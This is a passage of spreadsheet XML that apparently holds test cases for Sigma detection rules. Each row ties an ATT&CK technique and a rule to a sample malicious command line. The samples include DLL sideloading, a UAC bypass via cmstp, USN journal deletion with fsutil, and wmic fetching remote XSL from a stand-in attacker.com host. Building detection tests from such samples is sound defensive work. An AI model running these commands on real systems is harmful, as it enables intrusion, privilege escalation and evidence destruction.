          <t>reg.exe add "HKCU\Software\Microsoft\Office\16.0\Excel\Security" /v PythonFunctionWarnings /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2622" s="43" t="n"/>
      <c r="J2622" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2622" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2623" ht="15.75" customHeight="1" s="42">
      <c r="A2623" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2623" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C2623" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D2623" s="43" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E2623" s="43" t="inlineStr">
        <is>
          <t>copy deviceenroller.exe not_an_enroller.exe &amp;&amp; not_an_enroller.exe /PhoneDeepLink</t>
        </is>
      </c>
      <c r="F2623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2623" s="43" t="n"/>
      <c r="J2623" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2623" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2624" ht="15.75" customHeight="1" s="42">
      <c r="A2624" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2624" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dnscmd_install_new_server_level_plugin_dll</t>
        </is>
      </c>
      <c r="C2624" s="43" t="inlineStr">
        <is>
          <t>New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE</t>
        </is>
      </c>
      <c r="D2624" s="43" t="inlineStr">
        <is>
          <t>f63b56ee-3f79-4b8a-97fb-5c48007e8573</t>
        </is>
      </c>
      <c r="E2624" s="43" t="inlineStr">
        <is>
          <t>dnscmd.exe /CONFIG /SERVERLEVELPLUGINDLL malicious.dll</t>
        </is>
      </c>
      <c r="F2624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2624" s="43" t="n"/>
      <c r="J2624" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2624" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2625" ht="15.75" customHeight="1" s="42">
      <c r="A2625" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2625" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dnscmd_install_new_server_level_plugin_dll</t>
        </is>
      </c>
      <c r="C2625" s="43" t="inlineStr">
        <is>
          <t>New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE</t>
        </is>
      </c>
      <c r="D2625" s="43" t="inlineStr">
        <is>
          <t>f63b56ee-3f79-4b8a-97fb-5c48007e8573</t>
        </is>
      </c>
      <c r="E2625" s="43" t="inlineStr">
        <is>
          <t>dnscmd.exe /CONFIG /SERVERLEVELPLUGINDLL "malicious.dll"</t>
        </is>
      </c>
      <c r="F2625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2625" s="43" t="n"/>
      <c r="J2625" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2625" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2626" ht="15.75" customHeight="1" s="42">
      <c r="A2626" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2626" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dnscmd_install_new_server_level_plugin_dll</t>
        </is>
      </c>
      <c r="C2626" s="43" t="inlineStr">
        <is>
          <t>New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE</t>
        </is>
      </c>
      <c r="D2626" s="43" t="inlineStr">
        <is>
          <t>f63b56ee-3f79-4b8a-97fb-5c48007e8573</t>
        </is>
      </c>
      <c r="E2626" s="43" t="inlineStr">
        <is>
          <t>dnscmd.exe /CONFIG /SERVERLEVELPLUGINDLL C:\malicious.dll</t>
        </is>
      </c>
      <c r="F2626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2626" s="43" t="n"/>
      <c r="J2626" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2626" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2627" ht="15.75" customHeight="1" s="42">
      <c r="A2627" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2627" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C2627" s="43" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D2627" s="43" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E2627" s="43" t="inlineStr">
        <is>
          <t>"dllhost.exe"</t>
        </is>
      </c>
      <c r="F2627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2627" s="43" t="n"/>
      <c r="J2627" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2627" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2628" ht="15.75" customHeight="1" s="42">
      <c r="A2628" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2628" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_coercedpotato</t>
        </is>
      </c>
      <c r="C2628" s="43" t="inlineStr">
        <is>
          <t>HackTool - CoercedPotato Execution</t>
        </is>
      </c>
      <c r="D2628" s="43" t="inlineStr">
        <is>
          <t>e8d34729-86a4-4140-adfd-0a29c2106307</t>
        </is>
      </c>
      <c r="E2628" s="43" t="inlineStr">
        <is>
          <t>update_service.exe -e 1</t>
        </is>
      </c>
      <c r="F2628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2628" s="43" t="n"/>
      <c r="J2628" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2628" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2629" ht="15.75" customHeight="1" s="42">
      <c r="A2629" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2629" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C2629" s="43" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D2629" s="43" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E2629" s="43" t="inlineStr">
        <is>
          <t>DInjector.exe /am51 /password:secret</t>
        </is>
      </c>
      <c r="F2629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2629" s="43" t="n"/>
      <c r="J2629" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2629" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2630" ht="15.75" customHeight="1" s="42">
      <c r="A2630" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2630" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C2630" s="43" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D2630" s="43" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E2630" s="43" t="inlineStr">
        <is>
          <t>DInjector.exe /am^51 /password:secret</t>
        </is>
      </c>
      <c r="F2630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2630" s="43" t="n"/>
      <c r="J2630" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2630" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2631" ht="15.75" customHeight="1" s="42">
      <c r="A2631" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2631" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_inline_vbs</t>
        </is>
      </c>
      <c r="C2631" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Invoking Inline VBScript</t>
        </is>
      </c>
      <c r="D2631" s="43" t="inlineStr">
        <is>
          <t>1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd</t>
        </is>
      </c>
      <c r="E2631" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe updater.exe &amp;&amp; updater.exe vbscript:"Execute(RegRead('...')); window.close;"</t>
        </is>
      </c>
      <c r="F2631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2631" s="43" t="n"/>
      <c r="J2631" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2631" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2632" ht="15.75" customHeight="1" s="42">
      <c r="A2632" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2632" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_inline_vbs</t>
        </is>
      </c>
      <c r="C2632" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Invoking Inline VBScript</t>
        </is>
      </c>
      <c r="D2632" s="43" t="inlineStr">
        <is>
          <t>1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd</t>
        </is>
      </c>
      <c r="E2632" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe updater.exe &amp;&amp; updater.exe vbscript:Execute(RegRead('...')); window.close;</t>
        </is>
      </c>
      <c r="F2632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2632" s="43" t="n"/>
      <c r="J2632" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2632" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2633" ht="15.75" customHeight="1" s="42">
      <c r="A2633" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2633" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_inline_vbs</t>
        </is>
      </c>
      <c r="C2633" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Invoking Inline VBScript</t>
        </is>
      </c>
      <c r="D2633" s="43" t="inlineStr">
        <is>
          <t>1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd</t>
        </is>
      </c>
      <c r="E2633" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe updater.exe &amp;&amp; updater.exe vbscript:Execute(RegRead("...")); window.close;</t>
        </is>
      </c>
      <c r="F2633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2633" s="43" t="n"/>
      <c r="J2633" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2633" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2634" ht="15.75" customHeight="1" s="42">
      <c r="A2634" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2634" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_inline_vbs</t>
        </is>
      </c>
      <c r="C2634" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Invoking Inline VBScript</t>
        </is>
      </c>
      <c r="D2634" s="43" t="inlineStr">
        <is>
          <t>1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd</t>
        </is>
      </c>
      <c r="E2634" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe updater.exe &amp;&amp; updater.exe vbscript:Execute(RegRead('...'));window.close;</t>
        </is>
      </c>
      <c r="F2634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2634" s="43" t="n"/>
      <c r="J2634" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2634" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2635" ht="15.75" customHeight="1" s="42">
      <c r="A2635" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2635" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C2635" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D2635" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E2635" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe -s -ni C:\Path\To\Malicious.inf</t>
        </is>
      </c>
      <c r="F2635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2635" s="43" t="n"/>
      <c r="J2635" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2635" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2636" ht="15.75" customHeight="1" s="42">
      <c r="A2636" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2636" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2636" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2636" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2636" s="43" t="inlineStr">
        <is>
          <t>fsutil file setZeroData offset=0 length=10 C:\AtomicRedTeam\atomics\..\ExternalPayloads\T1070-2.txt</t>
        </is>
      </c>
      <c r="F2636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2636" s="43" t="n"/>
      <c r="J2636" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2636" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2637" ht="15.75" customHeight="1" s="42">
      <c r="A2637" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2637" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2637" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2637" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2637" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C:</t>
        </is>
      </c>
      <c r="F2637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2637" s="43" t="n"/>
      <c r="J2637" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2637" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2638" ht="15.75" customHeight="1" s="42">
      <c r="A2638" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2638" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2638" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2638" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2638" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C:\</t>
        </is>
      </c>
      <c r="F2638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2638" s="43" t="n"/>
      <c r="J2638" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2638" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2639" ht="15.75" customHeight="1" s="42">
      <c r="A2639" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2639" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2639" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2639" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2639" s="43" t="inlineStr">
        <is>
          <t>fsutil  usn deletejournal /D C:</t>
        </is>
      </c>
      <c r="F2639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2639" s="43" t="n"/>
      <c r="J2639" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2639" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2640" ht="15.75" customHeight="1" s="42">
      <c r="A2640" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2640" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2640" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2640" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2640" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C: \</t>
        </is>
      </c>
      <c r="F2640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2640" s="43" t="n"/>
      <c r="J2640" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2640" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2641" ht="15.75" customHeight="1" s="42">
      <c r="A2641" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2641" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2641" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2641" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2641" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C: | Out-Null</t>
        </is>
      </c>
      <c r="F2641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2641" s="43" t="n"/>
      <c r="J2641" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2641" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2642" ht="15.75" customHeight="1" s="42">
      <c r="A2642" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B2642" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C2642" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D2642" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E2642" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C: &gt; NUL</t>
        </is>
      </c>
      <c r="F2642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2642" s="43" t="n"/>
      <c r="J2642" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2642" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2643" ht="15.75" customHeight="1" s="42">
      <c r="A2643" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2643" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2643" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2643" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2643" s="43" t="inlineStr">
        <is>
          <t>wmic.exe os get /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F2643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2643" s="43" t="n"/>
      <c r="J2643" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2643" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2644" ht="15.75" customHeight="1" s="42">
      <c r="A2644" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2644" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2644" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2644" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2644" s="43" t="inlineStr">
        <is>
          <t>wmic.exe  os   get  /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F2644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2644" s="43" t="n"/>
      <c r="J2644" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2644" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2645" ht="15.75" customHeight="1" s="42">
      <c r="A2645" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2645" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2645" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2645" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2645" s="43" t="inlineStr">
        <is>
          <t>wmic os get /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F2645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2645" s="43" t="n"/>
      <c r="J2645" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2645" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2646" ht="15.75" customHeight="1" s="42">
      <c r="A2646" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2646" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2646" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2646" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2646" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -os get /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F2646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2646" s="43" t="n"/>
      <c r="J2646" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2646" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2647" ht="15.75" customHeight="1" s="42">
      <c r="A2647" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2647" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2647" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2647" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2647" s="43" t="inlineStr">
        <is>
          <t>wmic.exe os get /format:http://192.168.1.100/evil.xsl</t>
        </is>
      </c>
      <c r="F2647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2647" s="43" t="n"/>
      <c r="J2647" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2647" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2648" ht="15.75" customHeight="1" s="42">
      <c r="A2648" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B2648" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C2648" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2648" s="43" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E2648" s="43" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F2648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2648" s="43" t="n"/>
      <c r="J2648" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2648" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2649" ht="15.75" customHeight="1" s="42">
      <c r="A2649" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B2649" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C2649" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2649" s="43" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E2649" s="43" t="inlineStr">
        <is>
          <t>netsh -c interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=8080 connectaddress=10.0.0.5 connectport=80</t>
        </is>
      </c>
      <c r="F2649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2649" s="43" t="n"/>
      <c r="J2649" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2649" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2650" ht="15.75" customHeight="1" s="42">
      <c r="A2650" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2650" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C2650" s="43" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D2650" s="43" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
